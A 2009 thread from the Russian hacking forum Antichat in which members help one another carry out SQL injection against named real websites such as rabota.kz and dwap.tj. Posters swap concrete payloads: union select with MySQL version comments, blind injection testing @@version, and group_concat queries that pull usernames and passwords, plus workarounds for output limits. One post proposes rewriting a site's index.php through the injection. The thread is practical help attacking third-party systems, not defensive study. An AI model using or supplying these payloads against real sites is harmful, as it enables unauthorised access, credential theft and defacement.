HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4911  
Старый 23.01.2009, 00:46
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Цитата:
Сообщение от AFoST  
версия мускула = 3+ там нет union select
http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*
Ясненько, спасибо. Значит дальше рыть бесполезно?
 
Ответить с цитированием

  #4912  
Старый 23.01.2009, 00:48
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Как работать с 3 веткой:

http://forum.antichat.ru/showpost.php?p=565034&postcount=4
 
Ответить с цитированием

  #4913  
Старый 23.01.2009, 00:51
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Ну почему, блайнд sql фактически,

http://rabota.kz/candidates/vacancies.php?cat=-123+and+substring(@@version,1,1)=3

читай подпись, там есть
 
Ответить с цитированием

  #4914  
Старый 23.01.2009, 01:07
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от sabe  
попугай
да (
даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index

как? получилось?)
 
Ответить с цитированием

  #4915  
Старый 23.01.2009, 08:34
or1
Banned
Регистрация: 07.09.2008
Сообщений: 48
Провел на форуме:
127764

Репутация: -1
По умолчанию

Цитата:
Сообщение от попугай  
как? получилось?)
ребята подскажите кто-нить вот так выглядет сама сртpаничка

http://dwap.tj/chat/profile.php?id=1187&password=&ver=html

id=-1187&password=&ver=html

тут я ставлю минус между равно и 1187
и после как поставил минус выходит вот такая хринитень

Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 5 in /var/www/localhost/htdocs/dwap.tj/chat/profile.php on line 8
вопрос с могу я что-нить тут сделать,и как тут составить правильный запрос.

Последний раз редактировалось or1; 23.01.2009 в 08:40..
 
Ответить с цитированием

  #4916  
Старый 23.01.2009, 12:24
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Всем привет!

Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
 
Ответить с цитированием

  #4917  
Старый 23.01.2009, 12:28
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Цитата:
Что такое group_concat?
Разобрался. Длина возвращаемого значение GROUP_CONCAT ограничена переменной group_concat_max_len и обычно равна 1024. Поэтому и выбирается так мало данных...

Последний раз редактировалось groundhog; 23.01.2009 в 12:35..
 
Ответить с цитированием

  #4918  
Старый 23.01.2009, 12:32
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513

Репутация: 52
Отправить сообщение для MirA с помощью ICQ
По умолчанию

про group_concat
http://webi.ru/webi_articles/8_14_f.html
 
Ответить с цитированием

  #4919  
Старый 23.01.2009, 12:33
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Octave_Parango  
Всем привет!

Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
попробуй
1) через limit 1,5 или 1,10
2) concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pa ss)))

Последний раз редактировалось Gemini12; 23.01.2009 в 13:06..
 
Ответить с цитированием

  #4920  
Старый 23.01.2009, 12:43
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Gemini12, неа, не получается чиво-то (
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ